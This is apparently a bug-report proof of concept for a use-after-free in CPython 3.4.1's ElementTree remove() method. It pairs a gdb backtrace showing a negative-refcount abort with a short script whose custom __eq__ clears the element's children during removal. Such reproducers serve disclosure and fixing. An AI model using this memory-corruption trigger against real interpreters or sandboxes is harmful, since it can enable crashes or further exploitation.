# Program received signal SIGABRT, Aborted.
# 0x40022424 in __kernel_vsyscall ()
# (gdb) bt
# #0  0x40022424 in __kernel_vsyscall ()
# #1  0x400bb1df in raise () from /lib/i386-linux-gnu/libc.so.6
# #2  0x400be825 in abort () from /lib/i386-linux-gnu/libc.so.6
# #3  0x08067030 in Py_FatalError (
#     msg=0xbfed7a20 "/home/p/Python-3.4.1/Modules/_elementtree.c:1436 object at 0x405743ec has negative ref count -606348326")
#     at Python/pythonrun.c:2633
# #4  0x080f1374 in _Py_NegativeRefcount (fname=0x40646100 "/home/p/Python-3.4.1/Modules/_elementtree.c", lineno=1436, 
#     op=<unknown at remote 0x405743ec>) at Objects/object.c:203
# #5  0x4063dfa6 in element_remove (self=0x40583c34, args=(<xml.etree.ElementTree.Element at remote 0x40583bb4>,))
#     at /home/p/Python-3.4.1/Modules/_elementtree.c:1436
# (gdb) frame 5
# #5  0x4063dfa6 in element_remove (self=0x40583c34, args=(<xml.etree.ElementTree.Element at remote 0x40583bb4>,))
#     at /home/p/Python-3.4.1/Modules/_elementtree.c:1436
# 1436        Py_DECREF(self->extra->children[i]);
# (gdb) print i
# $1 = 1
# (gdb) print *(PyObject*)self->extra->children
# $3 = {_ob_next = 0x4057437c, _ob_prev = 0x405743ec, ob_refcnt = 1079461180, ob_type = 0x4057461c}
# 
# Fatal Python error: /home/p/Python-3.4.1/Modules/_elementtree.c:1436 object at 0x405743ec has negative ref count -606348326
# 
# "self->extra->children" is cleared in custom __eq__ method. Py_DECREF handles
# stale pointer. Use after free.
# 

import xml.etree.ElementTree as et

cnt = 0

class X:
  def __eq__(self, o):
    global e, L, cnt

    print("__eq__")
    cnt += 1
    if cnt == 2:
      L[:] = []
      e[:] = []
      return 1
    return 0


  def __getattribute__(self, a):
    
    return type(et.Element("h4h4"))

L = [X() for i in range(1337)]
e = et.Element("lol")
e.extend(L)
r = et.Element("remove")
e.remove(r)